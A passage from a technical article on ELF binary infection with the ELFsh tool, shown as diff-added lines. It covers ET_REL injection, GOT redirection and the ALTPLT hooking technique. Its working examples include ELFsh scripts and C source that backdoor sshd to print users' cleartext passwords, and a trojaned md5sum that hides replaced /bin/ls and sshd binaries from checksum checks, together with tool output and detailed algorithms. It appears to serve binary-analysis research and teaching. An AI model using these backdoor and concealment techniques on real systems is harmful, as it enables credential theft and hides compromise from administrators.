+[3] 0x08080B80 -> 0x08087E14 rw- memsz(029332) foff(228224) filesz(004168)
+[4] 0x08081B00 -> 0x08081BC8 rw- memsz(000200) foff(232192) filesz(000200)
+[5] 0x08048108 -> 0x08048128 r-- memsz(000032) foff(000264) filesz(000032)
+
+[Program header table .::. SHT correlation]
+[Object /usr/sbin/sshd]
+
+[*] SHT is not stripped 
+
+[00] PT_PHDR    
+[01] PT_INTERP         .interp 
+[02] PT_LOAD           .interp .note.ABI-tag .hash .dynsym .dynstr \
+		       .gnu.version .gnu.version_r .rel.got .rel.bss \
+		       .rel.plt .init .plt .text .fini .rodata 
+[03] PT_LOAD           .data .eh_frame .ctors .dtors .got .dynamic 
+[04] PT_DYNAMIC        .dynamic 
+[05] PT_NOTE           .note.ABI-tag 
+
+ $
+ -----END EXAMPLE 8-----
+
+
+	We have here two loadable segments, one is executable (matches the
+	code segment) and the other is writable (matches the data 
+	segment).
+
+	What we have to do is to inject all non-writable sections before
+	.interp (thus in the code segment), and all other section's after
+	.bss in the data segment. Let's code a handler for crypt() which
+	prints the clear password and exit. In this first example, we 
+	will use GOT redirection [12] and hijack crypt() which stays in 
+	the libc:
+
+
+ -----BEGIN EXAMPLE 9-----
+ $ cat mycrypt.c
+ #include <stdio.h>
+ #include <stdlib.h>
+ #include <unistd.h>
+ #include <fcntl.h>
+
+ int     glvar = 42;
+ int     bssvar;
+
+ char *mycrypt(const char *key, const char *salt)
+ {
+   bssvar = 2;
+   printf(".:: crypt redirected -key- = %s (%u .::. %u) \n", 
+         key, glvar, bssvar);
+   exit(0);
+ }
+ $ gcc -c mycrypt.c
+ $
+ -----END EXAMPLE 9-----
+
+
+	Using the 'reladd' command, we will inject mycrypt.o into sshd:
+
+
+ -----BEGIN EXAMPLE 10-----
+ $ cat etreladd.esh
+ #!/usr/bin/elfsh
+
+ load /usr/sbin/sshd
+ load mycrypt.o
+
+ # Inject mycrypt.o into sshd
+ reladd 1 2
+
+ # Modify crypt() got entry and make it point on mycrypt() which resides
+ # into mycrypt.o
+ set 1.got[crypt] mycrypt
+
+ save sshd.new
+ quit
+ 
+ $ ./etreladd.esh
+
+         Welcome to The ELF shell 0.5b9 .::. 
+
+         .::. This software is under the General Public License 
+         .::. Please visit http://www.gnu.org to know about Free Software 
+
+~load /usr/sbin/sshd
+  [*] New object /usr/sbin/sshd loaded on Fri Jul 25 04:43:58 2003
+
+~load mycrypt.o
+  [*] New object mycrypt.o loaded on Fri Jul 25 04:43:58 2003
+ 
+~reladd 1 2
+  [*] ET_REL mycrypt.o injected succesfully in ET_EXEC /usr/sbin/sshd
+
+~set 1.got[crypt] mycrypt
+  [*] Field set succesfully 
+
+~save sshd.new
+  [*] Object sshd.new save successfully 
+
+~quit
+ [*] Unloading object 1 (mycrypt.o)   
+ [*] Unloading object 2 (/usr/sbin/sshd) * 
+
+         Good bye ! .::. The ELF shell 0.5b9 
+ $
+ -----END EXAMPLE 10-----
+
+
+	Our script rocked. As I said, the symbol tables and the .bss from
+	the module have been fused with those from the executable file
+	and the SHT has been kept synchronized, so that resolving is also
+	possible in the injected code:
+
+ 
+ -----BEGIN EXAMPLE 11-----
+ $ elfsh -f sshd.new -q -s -p
+[SECTION HEADER TABLE .::. SHT is not stripped]
+[Object sshd.new]
+
+[00] (nil)      -------                 foff:00000000 sz:00000000 link:00
+[01] 0x80450f4  a-x---- .orig.plt       foff:00000244 sz:00004096 link:00
+[02] 0x80460f4  a------ mycrypt.o.rodata foff:00004340 sz:00004096 link:00
+[03] 0x80470f4  a-x---- mycrypt.o.text  foff:00008436 sz:00004096 link:00
+[04] 0x80480f4  a------ .interp         foff:00012532 sz:00000019 link:00
+[05] 0x8048108  a------ .note.ABI-tag   foff:00012552 sz:00000032 link:00
+[06] 0x8048128  a------ .hash           foff:00012584 sz:00001784 link:07
+[07] 0x8048820  a------ .dynsym         foff:00014368 sz:00003952 link:08
+[08] 0x8049790  a------ .dynstr         foff:00018320 sz:00002605 link:00
+[09] 0x804a1be  a------ .gnu.version    foff:00020926 sz:00000494 link:07
+[10] 0x804a3ac  a------ .gnu.version_r  foff:00021420 sz:00000096 link:08
+[11] 0x804a40c  a------ .rel.got        foff:00021516 sz:00000008 link:07
+[12] 0x804a414  a------ .rel.bss        foff:00021524 sz:00000056 link:07
+[13] 0x804a44c  a------ .rel.plt        foff:00021580 sz:00001768 link:07
+[14] 0x804ab34  a-x---- .init           foff:00023348 sz:00000037 link:00
+[15] 0x804ab5c  a-x---- .plt            foff:00023388 sz:00003552 link:00
+[16] 0x804b940  a-x---- .text           foff:00026944 sz:00145276 link:00
+[17] 0x806f0bc  a-x---- .fini           foff:00172220 sz:00000028 link:00
+[18] 0x806f0e0  a------ .rodata         foff:00172256 sz:00068256 link:00
+[19] 0x8080b80  aw----- .data           foff:00240512 sz:00003048 link:00
+[20] 0x8081768  aw----- .eh_frame       foff:00243560 sz:00000004 link:00
+[21] 0x808176c  aw----- .ctors          foff:00243564 sz:00000008 link:00
+[22] 0x8081774  aw----- .dtors          foff:00243572 sz:00000008 link:00
+[23] 0x808177c  aw----- .got            foff:00243580 sz:00000900 link:00
+[24] 0x8081b00  aw----- .dynamic        foff:00244480 sz:00000200 link:08
+[25] 0x8081bc8  -w----- .sbss           foff:00244704 sz:00000000 link:00
+[26] 0x8081be0  aw----- .bss            foff:00244704 sz:00025144 link:00
+[27] 0x8087e18  aw----- mycrypt.o.data  foff:00269848 sz:00000004 link:00
+[28] (nil)      ------- .comment        foff:00269852 sz:00002812 link:00
+[29] (nil)      ------- .note           foff:00272664 sz:00001480 link:00
+[30] (nil)      ------- .shstrtab       foff:00274144 sz:00000300 link:00
+[31] (nil)      ------- .symtab         foff:00274444 sz:00004064 link:00
+[32] (nil)      ------- .strtab         foff:00278508 sz:00003423 link:00
+
+[Program header table .::. PHT]
+[Object sshd.new]
+
+[0] 0x08045034 -> 0x080450F4 r-x memsz(000192) foff(000052) filesz(000192)
+[1] 0x080480F4 -> 0x08048107 r-- memsz(000019) foff(012532) filesz(000019)
+[2] 0x08045000 -> 0x0807FB80 r-x memsz(240512) foff(000000) filesz(240512)
+[3] 0x08080B80 -> 0x08087E1C rw- memsz(029340) foff(240512) filesz(029340)
+[4] 0x08081B00 -> 0x08081BC8 rw- memsz(000200) foff(244480) filesz(000200)
+[5] 0x08048108 -> 0x08048128 r-- memsz(000032) foff(012552) filesz(000032)
+
+[Program header table .::. SHT correlation]
+[Object sshd.new]
+
+[*] SHT is not stripped 
+ 
+[0] PT_PHDR    
+[1] PT_INTERP         .interp 
+[2] PT_LOAD           .orig.plt mycrypt.o.rodata mycrypt.o.text .interp 
+		      .note.ABI-tag .hash .dynsym .dynstr .gnu.version  
+		      .gnu.version_r .rel.got .rel.bss .rel.plt .init   
+		      .plt .text .fini .rodata 
+[3] PT_LOAD           .data .eh_frame .ctors .dtors .got .dynamic .sbss
+		      .bss mycrypt.o.data 
+[4] PT_DYNAMIC        .dynamic 
+[5] PT_NOTE           .note.ABI-tag 
+
+ $
+ -----END EXAMPLE 11-----	
+
+
+	The new sections can be easily spotted in the new SHT, since
+	their name starts with the module name (mycrypt.o.*). Please
+	elude the .orig.plt presence for the moment. This section 
+	is injected at ET_REL insertion time, but it is not used in 
+	this example and it will be explained as a stand-alone technique
+	in the next chapter.
+
+	We can see that the new BSS size is 4 bytes bigger than the
+	original one. It is because the module BSS was only filled with
+	one variable (bssvar), which was a 4 bytes sized integer since
+	this specific example was done on a 32 bits architecture. The
+	difficulty of this operation is to find the ET_REL object BSS
+	section size, because it is set to 0 in the SHT. For this
+	operation, we need to care about variable address alignement
+	using the st_value field from each SHN_COMMON symbols of the
+	ET_REL object, as specified by the ELF reference. Details for
+	this algorithm are given later in the article.
+
+	It works on Solaris as well, even if ET_REL files generated by
+	Solaris-ELF ld have no .bss section entry in the SHT. The 0.51b2
+	implementation has one more limitation on Solaris, which
+	is a 'Malloc problem' happening at the first malloc() call when
+	using a section post-bss injection. You dont have to use this kind
+	of section injection ; ET_REL injection works well on Solaris if
+	you do not use initialized global variables. This problem has been
+	solved in 0.51b3 by shifting _end, _edata, and _END_ dynamic symbols
+	so that they still points on the beginning of the heap (e.g. at
+	the end of the last post-bss mapped section, or at the end of the
+	bss, if there is no post-bss mapped section).
+
+	Also, the .shstrtab, .symtab, and .strtab sections have been
+	extended, and now contain extra symbol names, extra section names,
+	and extra symbols copied from the ET_REL object.
+
+	You can note that pre-interp injected sections base address is
+	congruent getpagesize(), so that the executable segment always
+	starts at the beginning of a page, as requested by the ELF
+	reference. ELFsh could save some place here, instead of allocating
+	the size of a page each time a section is injected, but that would
+	complexify the algorithm a bit, so the congruence is kept for 
+	each inserted section.
+	
+	The implementation has the cool advantage of -NOT- having to move
+	the original executable address space, so that no relocation of
+	the original code is needed. In other words, only the .o object
+	sections are relocated and we can be sure that no false positive
+	relocation is possible (e.g. we -DO NOT- have to find all
+	references in the sshd code and patch them because the address
+	space changed).
+
+	This is the injected code section's assembly dump, which contains 
+	the mycrypt function:
+
+
+ -----BEGIN EXAMPLE 12-----
+ $ elfsh -f sshd.new -q -D mycrypt.o.text
+
+ 080470F4 mycrypt.o.text + 0            push          %ebp             
+ 080470F5 mycrypt.o.text + 1            mov           %esp,%ebp        
+ 080470F7 mycrypt.o.text + 3            sub           $8,%esp          
+ 080470FA mycrypt.o.text + 6            mov           $2,<bssvar>      
+ 08047104 mycrypt.o.text + 16           mov           <bssvar>,%eax    
+ 08047109 mycrypt.o.text + 21           push          %eax             
+ 0804710A mycrypt.o.text + 22           mov           <glvar>,%eax     
+ 0804710F mycrypt.o.text + 27           push          %eax             
+ 08047110 mycrypt.o.text + 28           mov           8(%ebp),%eax     
+ 08047113 mycrypt.o.text + 31           push          %eax             
+ 08047114 mycrypt.o.text + 32           push          $<mycrypt.o.rodata> 
+ 08047119 mycrypt.o.text + 37           call          <printf>         
+ 0804711E mycrypt.o.text + 42           add           $10,%esp         
+ 08047121 mycrypt.o.text + 45           add           $0xFFFFFFF4,%esp   
+ 08047124 mycrypt.o.text + 48           push          $0               
+ 08047126 mycrypt.o.text + 50           call          <exit>           
+ 0804712B mycrypt.o.text + 55           add           $10,%esp         
+ 0804712E mycrypt.o.text + 58           lea           0(%esi),%esi     
+ 08047134 mycrypt.o.text + 64           leave      
+ 08047135 mycrypt.o.text + 65           ret
+ -----END EXAMPLE 12-----
+
+
+	 Lets test our new sshd:
+
+
+ $ ssh mayhem@localhost
+ Enter passphrase for key '/home/mayhem/.ssh/id_dsa': <-- type <ENTER>
+ mayhem@localhost's password: <--- type your passwd
+ Connection closed by 127.0.0.1
+ $ 
+ 
+
+	Let's verify on the server side what happened:
+
+
+ $ ./sshd.new -d 
+debug1: Seeding random number generator
+debug1: sshd version OpenSSH_3.0.2p1
+debug1: private host key: #0 type 0 RSA1
+debug1: read PEM private key done: type RSA
+debug1: private host key: #1 type 1 RSA
+debug1: read PEM private key done: type DSA
+debug1: private host key: #2 type 2 DSA
+debug1: Bind to port 22 on 0.0.0.0.
+Server listening on 0.0.0.0 port 22.
+debug1: Server will not fork when running in debugging mode.
+Connection from 127.0.0.1 port 40619
+debug1: Client protocol version 2.0; client software version OpenSSH_3.5p1
+debug1: match: OpenSSH_3.5p1 pat ^OpenSSH
+Enabling compatibility mode for protocol 2.0
+debug1: Local version string SSH-2.0-OpenSSH_3.0.2p1
+debug1: Rhosts Authentication disabled, originating port 40619 not trusted
+debug1: list_hostkey_types: ssh-rsa,ssh-dss
+debug1: SSH2_MSG_KEXINIT sent
+debug1: SSH2_MSG_KEXINIT received
+debug1: kex: client->server aes128-cbc hmac-md5 none
+debug1: kex: server->client aes128-cbc hmac-md5 none
+debug1: SSH2_MSG_KEX_DH_GEX_REQUEST received
+debug1: SSH2_MSG_KEX_DH_GEX_GROUP sent
+debug1: dh_gen_key: priv key bits set: 127/256
+debug1: bits set: 1597/3191
+debug1: expecting SSH2_MSG_KEX_DH_GEX_INIT
+debug1: bits set: 1613/3191
+debug1: SSH2_MSG_KEX_DH_GEX_REPLY sent
+debug1: kex_derive_keys
+debug1: newkeys: mode 1
+debug1: SSH2_MSG_NEWKEYS sent
+debug1: waiting for SSH2_MSG_NEWKEYS
+debug1: newkeys: mode 0
+debug1: SSH2_MSG_NEWKEYS received
+debug1: KEX done
+debug1: userauth-request for user mayhem service ssh-connection method \
+none
+debug1: attempt 0 failures 0
+Failed none for mayhem from 127.0.0.1 port 40619 ssh2
+debug1: userauth-request for user mayhem service ssh-connection method \
+publickey
+debug1: attempt 1 failures 1
+debug1: test whether pkalg/pkblob are acceptable
+debug1: temporarily_use_uid: 1000/31337 (e=0)
+debug1: trying public key file /home/mayhem/.ssh/authorized_keys
+debug1: matching key found: file /home/mayhem/.ssh/authorized_keys, line 1
+debug1: restore_uid
+Postponed publickey for mayhem from 127.0.0.1 port 40619 ssh2
+debug1: userauth-request for user mayhem service ssh-connection method \
+keyboard-interactive
+debug1: attempt 2 failures 1
+debug1: keyboard-interactive devs 
+debug1: auth2_challenge: user=mayhem devs=
+debug1: kbdint_alloc: devices ''
+Failed keyboard-interactive for mayhem from 127.0.0.1 port 40619 ssh2
+debug1: userauth-request for user mayhem service ssh-connection method \
+password
+debug1: attempt 3 failures 2
+.:: crypt redirected -key- = mytestpasswd (42 .::. 2) 
+ $
+
+	
+	Fine. If you want extreme details on the implementation, please
+	read the ELFsh code, particulary libelfsh/relinject.c. For the
+	academic audience, the pseudo-code algorithms are provided.
+	Because ET_REL injection is based on BSS and Symbol table fusion, 
+	section pre-interp injection, section post-bss injection, 
+	SHT shifting, SHT entry insertion, symbol injection, and section
+	data injection, all those algorithms are also available. The BSS
+	physical insertion is performed only once, at the first use of
+	post-bss injection. The general algorithm for ET_REL injection is
+	as follow:
+
+
+ 1/ Fuse ET_REL and ET_EXEC .bss sections
+ 2/ Find and inject ET_REL allocatable sections into ET_EXEC
+ 3/ Synchronize ET_EXEC symbol table (inject missing ET_REL symbols)
+ 4/ Relocate each injected section if its .rel(a) table is available
+
+ 
+	Now let's give some details ;)
+
+	
+--------[ .:: MAIN ALGORITHM : ET_REL injection into ET_EXEC ::.
+
+       
+       1/ Insert ET_REL object .bss into ET_EXEC (see BSS fusion algo)
+
+       2/ FOREACH section in ET_REL object
+          [
+	     IF section is a/ allocatable (sh_flags & SHF_ALLOC)
+			   b/ non-null sized (sh_size != 0)
+			   c/ data-typed (sh_type == SHT_PROGBITS)
+	     [
+
+		IF section is writable -or- OS is FreeBSD
+		[
+		  - Inject post-bss section into ET_EXEC
+		]
+		ELSE
+		[
+		  - Inject pre-interp section into ET_EXEC
+		]
+	     ]
+          ]
+
+       3/ Insert ET_REL .symtab into ET_EXEC (symtab fusion algorithm)
+
+       4/ FOREACH section in ET_REL object
+       [
+	  IF a/ section has been injected in 2. (same conditions)
+	     b/ section needs relocation (.rel.sctname is found in ET_REL)
+	  [
+	      - Relocate the section
+	  ]
+       ]
+
+
+--------[ BSS fusion algorithm
+
+
+       - Insert ET_EXEC BSS physically if not already done (see next algo)
+       FOREACH symbol from the ET_REL object
+       [
+	  IF symbol points into the BSS (st_shndx & SHN_COMMON)
+	  [
+	     WHILE ET_EXEC .bss size is not aligned (sh_size % st_value)
+             [
+	       - Increment by 1 the .bss size field (sh_size)
+	     ]
+	     - Insert symbol w/ st_value = .bss sh_addr + .bss sh_size
+	     - Add symbol size to ET_EXEC .bss size (sh_size)
+	  ]
+       ]
+
+
+---------[ BSS physical insertion algorithm 
+
+
+	 FOREACH PHT entry
+	 [
+		IF a/ segment is loadable (p_type == PT_LOAD) 
+		   b/ segment is writable (p_flags & PF_W)
+		[
+		  - Put p_memsz value into p_filesz
+		  - End of algorithm
+		]	
+	 ]
+
+
+--------[ Symbol Tables fusion algorithm
+
+
+       FOREACH symbol in ET_REL object
+       [
+          IF Symbol type is function (STT_FUNC) or variable (STT_OBJECT)
+	  [
+	     - Get parent section for this symbol using st_shndx field
+	     IF Parent section has been injected in 2. (same conditions)
+	     [
+	        - Add section's base address to the symbol value
+		- Inject new symbol into ET_EXEC
+	     ]
+          ]
+       ]
+
+
+--------[ Section pre-interp injection algorithm
+
+	- Compute section size congruent with page size
+	- Create new section's header
+	- Inject section header (see SHT header insertion algorithm)
+	FOREACH PHT entry
+	[
+	   IF a/ segment type is loadable (p_type == PT_LOAD)
+	      b/ segment is executable (p_flags & PF_X)
+	   [
+	      - Add section's size to p_filesz and p_memsz
+	      - Substract section's size from p_vaddr and p_paddr
+	   ]
+	   ELSE IF segment type is PT_PHDR
+	   [
+              - Substract section's size from p_vaddr and p_paddr
+	   ]
+	   ELSE
+	   [
+	      - Add section's size to p_offset
+	   ]
+       ]
+       - Shift SHT (see algorithm below)
+
+
+---------[ Section post-bss injection algorithm
+
+
+	- Create new section's header 
+	- Inject section header (see SHT header insertion algorithm)
+	FOREACH PHT entry
+	[
+	   IF a/ segment is loadable (p_type == PT_LOAD)
+	      b/ segment is writable (p_flags & PF_W)
+	   [
+	      - Add section's size to p_memsz and p_filesz
+	      - End of algorithm
+	   ]	
+	]
+	- Shift SHT by the section size (see next algorithm)
+
+
+---------[ SHT shifting algorithm
+
+
+	FOREACH SHT entry
+	[
+	   IF current linked section (sh_link) points after new section
+	   [
+	      - Increment by 1 the sh_link field
+	   ]
+	   IF current file offset > injected section file offset
+	   [
+	      - Add injected section sh_size to current sh_offset
+	   ]
+	]
+
+
+---------[ SHT header insertion algorithm
+
+	   
+	- Insert new section's name into .shstrtab
+	- Insert new entry in SHT at requested range
+	- Increment by 1 the e_shnum field in ELF header
+	FOREACH SHT entry
+	[
+	   IF current entry file offset is after SHT file offset
+	   [
+	      - Add e_shentsize from ELF header to current sh_offset
+	   ]
+	]
+	IF injected section header sh_offset <= SHT file offset
+	[
+	  - Add new section size (sh_size) to e_shoff field in ELF header
+	]
+	IF requested new section range <= section string table index
+	[
+	   - Increment sh_strndx field in ELF header
+	]
+
+
+---------[ Symbol injection algorithm
+
+
+	- Insert symbol name into .strtab section
+	- Insert symbol entry into .symtab section
+
+
+---------[ Section data injection algorithm (apply to all type of section)
+	  
+
+	- Insert data into section
+	- Add injected data size to section's sh_size
+	IF SHT file offset > section file offset
+	[
+	  - Add injected data size to e_shoff in ELF header
+	]
+	FOREACH SHT entry
+	[
+	   IF current entry sh_offset field > extended section file offset
+	   [
+	      IF current entry sh_addr field is non-null
+	      [
+	         - Add injected data size to sh_addr
+	      ]
+	      - Add injected data size to sh_offset
+	   ]
+	]
+	IF extended section sh_addr is non-null
+	[
+	   FOREACH symbol table entry
+	   [
+	      IF symbol points after extended section former upper bound
+	      [
+		 - Add injected data size to st_value field
+	      ]
+	   ]
+	]
+
+
+     The relocation (step 4) algorithm wont be detailed, because it is
+     already all explained in the ELF reference. In short, the relocation 
+     process consists in updating all the addresses references in the 
+     injected ET_REL code, using the available merged symbol tables in 
+     the ET_EXEC file. There are 12 relocation types on INTEL and 56 
+     relocations types on SPARC, however, only 2 types are mostly used on
+     INTEL, and only 3 on SPARC for ET_REL objects.
+
+     This last stage is a switch/case based algorithm, which has in
+     charge to update some bytes, many times, in each injected mapped
+     section. The relocation tables contains all the information necessary
+     for this operation, their name is .rel.<target> (or .rela.<target> on
+     SPARC), with <target> beeing the section which is going to be 
+     relocated using this table). Those sections can be easily found just
+     parsing the SHT and looking for sections whoose st_type is SHT_REL 
+     (or SHT_RELA on SPARC).
+
+     What makes the ELFsh relocation engine powerful, is the using of both
+     symbol table (.symtab and .dynsym), which means that the injected 
+     code can resolve symbols from the executable itself, e.g. it is 
+     possible to call the core functions of the executable, as well 
+     as existing .plt entries from the backdoor code, if their symbol 
+     value is available. For more details about the relocation step, 
+     please look at the ELFsh code in libelfsh/relinject.c, particulary 
+     at the elfsh_relocate_i386 and and elfsh_relocate_sparc.
+
+     As suggested in the previous paragraph, ELFsh has a limitation since
+     it is not possible to call functions not already present in the 
+     binary. If we want to call such functions, we would have to add 
+     information for the dynamic linker, so that the function address can
+     be resolved in runtime using the standard GOT/PLT mechanism. It 
+     would requires .got, .plt, .rel.plt, .dynsym, .dynstr, and .hash
+     extensions, which is not trivial when we dont want to move the 
+     binary data and code zones from their original addresses. 
+
+     Since relocation information is not available for ET_EXEC ELF 
+     objects, we woulnt be sure that our reconstructed relocation 
+     information would be 100% exact, without having a very strong and 
+     powerful dataflow analysis engine. This was proved by modremap 
+     (modules/modremap.c) written by spacewalkr, which is a 
+     SHT/PHT/symtab shifter. Coupled to the ELFsh relocation finder 
+     (vm/findrel.c), this module can remap a ET_EXEC binary in another 
+     place of the address space. This is known to work for /bin/ls and 
+     various /bin/* but bigger binaries like ssh/sshd cannot be relocated
+     using this technique, because valid pointers double words are not
+     always real pointers in such bins (false positives happen in hash
+     values).
+
+     For this reason, we dont want to move ET_EXEC section's from their
+     original place. Instead, it is probably possible to add extra 
+     sections and use big offsets from the absolute addresses stored
+     into .dynamic, but this feature is not yet provided. A careful 
+     choice of external functions hijacking is usually enough to get rid
+     of the non-present symbol problem, even if this 'extra-function 
+     resolving' feature will probably be implemented in the future. For
+     some sections like .hash, it may be necessary to do a copy of the
+     original section after .bss and change the referenced address in
+     the .dynamic section, so that we can extend the hash without moving
+     any original code or data.
+
+
+-------[ 4. Infection : ALTPLT technique
+
+
+     Now that we have a decent residency technique in ET_REL injection,
+     let's focus on a new better infection technique than GOT redirection
+     and PLT infection : the ALTPLT technique. This new technique takes
+     advantage of the symbol based function address resolving of the
+     previous technique, as detailed below.
+
+     ALTPLT is an improvement of PLT infection technique. Silvio Cesare
+     describes how to modify the .plt section, in order to redirect
+     function calls to library onto another code, so called the hook
+     code. From [4], the algorithm of original .plt infection:
+
+
+     -----%<-------%<--------%<---------%<----------%<--------%<---------
+
+     '' The algorithm at the entry point code is as follows...
+
+     * mark the text segment writable
+     * save the PLT(GOT) entry
+     * replace the PLT(GOT) entry with the address of the new libcall
+
+     The algorithm in the new library call is as follows...
+
+     * do the payload of the new libcall
+     * restore the original PLT(GOT) entry
+     * call the libcall
+     * save the PLT(GOT) entry again (if it is changed)
+     * replace the PLT(GOT) entry with the address of the new libcall ''
+
+     -----%<-------%<--------%<---------%<----------%<--------%<---------
+
+     The implementation of such an algorithm was presented in x86
+     assembly language using segment padding residency. This technique
+     is not enough because:
+
+	 1/ It is architecture dependant
+	 2/ Strict segments rights may not be kept consistant (PaX unsafe)
+	 3/ The general layout of the technique lacks a formal interface
+	 
+     The new ALTPLT technique consists of copying the Procedure Linkage
+     Table (.plt) to an alternative section, called .orig.plt, using a 
+     pre-interp injection, so that it resides in the read-only code
+     segment. For each entry of the .orig.plt, we create and inject a
+     new reference symbol, which name the same as the .plt entry symbol
+     at the same index, except that it starts by 'old_'.
+
+     Using this layout, we are able to perform standard PLT infection on
+     the original .plt section, but instead of having a complex
+     architecture dependant hook code, we use an injected function
+     residing in hook.o.text, which is the text section of an ET_REL
+     module that was injected using the technique described in the	
+     previous part of the paper. 
+
+     This way, we can still call the original function using
+     old_funcname(), since the injected symbol will be available for
+     the relocation engine, as described in the ET_REL injection
+     algorithm ;).
+
+     We keep the GOT/PLT mechanism intact and we rely on it to provide
+     a normal function address resolution, like in every dynamic
+     executable files. The .got section will now be unique for both .plt 
+     and .orig.plt sections. The added section .orig.plt is a strict copy
+     of the original .plt, and will not ever be overwritten. In other
+     words, .orig.plt is PaX safe. The only difference will be that 
+     original .plt entries may not use .got, but might be redirected on
+     another routine using a direct branchement instruction.
+
+     Let's look at an example where the puts() function is hijacked, and
+     the puts_troj() function is called instead.
+
+
+     On INTEL:
+
+
+ -----BEGIN EXAMPLE 13-----
+ old_puts + 0   jmp  *<_GLOBAL_OFFSET_TABLE_ + 20>      FF 25 00 97 04 08 
+ old_puts + 6   push          $10                       68 10 00 00 00 
+ old_puts + 11  jmp           <old_dlresolve>           E9 C0 FF FF FF 
+
+ puts + 0       jmp           <puts_troj>               E9 47 ED FF FF 
+ puts + 5       or            %ch,10(%eax)              08 68 10 
+ puts + 8       add           %al,(%eax)                00 00 
+ puts + 10      add           %ch,%cl                   00 E9 
+ puts + 12      sar           $FF,%bh                   C0 FF FF 
+ puts + 15      (bad)         %edi                      FF FF 
+ -----END EXAMPLE 13-----
+
+
+     On SPARC:
+
+
+ -----BEGIN EXAMPLE 14-----
+ old_puts + 0   sethi  %hi(0xf000), %g1			03 00 00 3c     
+ old_puts + 4   b,a   e0f4 <func2+0x1e0c>		30 bf ff f0     
+ old_puts + 8   nop					01 00 00 00     
+
+ puts + 0	jmp  %g1 + 0xf4 ! <puts_troj>		81 c0 60 f4     
+ puts + 4	nop					01 00 00 00     
+ puts + 8	sethi  %hi(0x12000), %g1		03 00 00 48     
+ -----END EXAMPLE 14-----
+
+      
+    This is the only architecture dependant operation in the ALTPLT 
+    algorithm. It means that this feature can be implemented very easily
+    for other processors as well. However, on SPARC there is one more
+    modification to do on the first entry of the .orig.plt section.
+    Indeed, the SPARC architecture does not use a Global Offset Table 
+    (.got) for function address resolving, instead the .plt section is 
+    directly modified at dynamic linking time. Except for this
+    difference, the SPARC .plt works just the same as INTEL .plt (both 
+    are using the first .plt entry each time, as explained in the ELF 
+    reference).
+
+    For this reason, we have to modify the first .orig.plt entry to make
+    it point on the first .plt entry (which is patched in runtime before 
+    the main() function takes control). In order to patch it, we need to
+    use a register other than %g1 (since this one is used by the dynamic 
+    linker to identify the .plt entry which has to be patched), for 
+    example %g2 (elfsh_hijack_plt_sparc_g2 in libelfsh/hijack.c).
+
+    Patched first .orig.plt entry on SPARC:
+
+      
+ -----BEGIN EXAMPLE 15-----
+ .orig.plt	 sethi  %hi(0x20400), %g2		05 00 00 81
+ .orig.plt	 jmp    %g2 + 0x2a8  ! <.plt>		81 c0 a2 a8
+ .orig.plt	 nop					01 00 00 00
+ -----END EXAMPLE 15-----
+
+
+    The reason for NOP instructions after the branching instruction
+    (jmp) is because of SPARC delay slot. In short, SPARC branchement
+    is done in such way that it changes the NPC register (New Program
+    Counter) and not the PC register, and the instruction after a
+    branching one is executed before the real branchement. 
+
+    Let's use a new example which combines ET_REL injection and ALTPLT
+    infection this time (instead of GOT redirection, like in the previous
+    sshd example). We will modify md5sum so that access to /bin/ls and
+    /usr/sbin/sshd is redirected. In that case, we need to hijack the
+    fopen64() function used by md5sum, swap the real path with the
+    backup path if necessary, and call the original fopen64 as if
+    nothing had happened:
+
+
+ -----BEGIN EXAMPLE 16-----
+ $ cat md16.esh
+ #!/usr/bin/elfsh
+ 
+ load /usr/bin/md5sum
+ load test.o
+ 
+ # Add test.o into md5sum
+ reladd 1 2
+
+ # Redirect fopen64 to fopen64_troj (in test.o) using ALTPLT technique
+ redir fopen64 fopen64_troj
+
+ save md5sum.new
+ quit
+ $ chmod +x md16.esh
+ $ 
+ -----END EXAMPLE 16-----
+
+
+	  Let's look at the injected code. Because the strcmp() libc
+	  function is not used by md5sum and therefore its symbol is not
+	  available in the binary, we have to copy it in the module
+	  source:
+
+
+ -----BEGIN EXAMPLE 17-----
+ $ cat test.c
+ #include <stdlib.h>
+
+ #define HIDDEN_DIR      "/path/to/hidden/dir"
+ #define LS              "/bin/ls"
+ #define SSHD            "/usr/sbin/sshd"
+ #define LS_BAQ          "ls.baq"
+ #define SSHD_BAQ        "sshd.baq"
+
+ int     mystrcmp(char *str1, char *str2)
+ {
+   u_int cnt;
+
+   for (cnt = 0; str1[cnt] && str2[cnt]; cnt++)
+     if (str1[cnt] != str2[cnt])
+       return (str1[cnt] - str2[cnt]);
+   return (str1[cnt] - str2[cnt]);
+ }
+
+ int     fopen64_troj(char *str1, char *str2)
+ {
+   if (!mystrcmp(str1, LS))
+     str1 = HIDDEN_DIR "/" LS_BAQ;
+   else if (!mystrcmp(str1, SSHD))
+     str1 = HIDDEN_DIR "/" SSHD_BAQ;
+   return (old_fopen64(str1, str2));
+ }
+ $ gcc test.c -c 
+ $ 
+ -----END EXAMPLE 17-----
+
+
+	  For this last example, the full relinking information
+	  will be printed on stdout, so that the reader can enjoy
+	  all the details of the implementation:
+
+
+ -----BEGIN EXAMPLE 18-----
+ $ 
+
+  Welcome to The ELF shell 0.5b9 .::.
+
+  .::. This software is under the General Public License
+  .::. Please visit http://www.gnu.org to know about Free Software
+
+~load /usr/bin/md5sum
+ [*] New object /usr/bin/md5sum loaded on Sat Aug  2 16:16:32 2003
+
+~exec cc test.c -c
+ [*] Command executed successfully
+
+~load test.o
+ [*] New object test.o loaded on Sat Aug  2 16:16:32 2003
+
+~reladd 1 2
+[DEBUG_RELADD] Found BSS zone lenght [00000000] for module [test.o]
+[DEBUG_RELADD] Inserted STT_SECT symbol test.o.text       [080470F4]
+[DEBUG_RELADD] Inserted STT_SECT symbol test.o.rodata     [080460F4]
+[DEBUG_RELADD] Inserted STT_SECT symbol .orig.plt         [080450F4]
+[DEBUG_RELADD] Injected symbol old_dlresolve              [080450F4]
+[DEBUG_RELADD] Injected symbol old_ferror                 [08045104]
+[DEBUG_COPYPLT] Symbol at .plt + 16 injected succesfully
+[DEBUG_RELADD] Injected symbol old_strchr                 [08045114]
+[DEBUG_COPYPLT] Symbol at .plt + 32 injected succesfully
+[DEBUG_RELADD] Injected symbol old_feof                   [08045124]
+[DEBUG_COPYPLT] Symbol at .plt + 48 injected succesfully
+[DEBUG_RELADD] Injected symbol old___register_frame_info  [08045134]
+[DEBUG_COPYPLT] Symbol at .plt + 64 injected succesfully
+[DEBUG_RELADD] Injected symbol old___getdelim             [08045144]
+[DEBUG_COPYPLT] Symbol at .plt + 80 injected succesfully
+[DEBUG_RELADD] Injected symbol old_fprintf                [08045154]
+[DEBUG_COPYPLT] Symbol at .plt + 96 injected succesfully
+[DEBUG_RELADD] Injected symbol old_fflush                 [08045164]
